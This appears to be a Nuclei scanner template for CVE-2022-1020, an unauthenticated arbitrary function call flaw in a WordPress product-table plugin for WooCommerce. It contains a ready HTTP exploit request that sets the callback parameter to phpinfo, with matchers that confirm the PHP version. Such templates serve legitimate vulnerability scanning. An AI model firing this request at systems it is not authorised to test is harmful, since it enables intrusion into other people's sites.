id: CVE-2022-1020 info: name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call author: Akincibor severity: critical description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument. reference: - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5 - https://nvd.nist.gov/vuln/detail/CVE-2022-1020 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1020 cwe-id: CWE-352,CWE-862 cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:*:*:* epss-score: 0.00604 tags: wpscan,wp,wp-plugin,wordpress,cve,cve2022,unauth metadata: max-request: 1 http: - raw: - | POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded option_key=a&perpose=update&callback=phpinfo matchers-condition: and matchers: - type: word words: - "PHP Extension" - "PHP Version" condition: and - type: status status: - 200 extractors: - type: regex part: body group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' # Enhanced by mp on 2022/05/18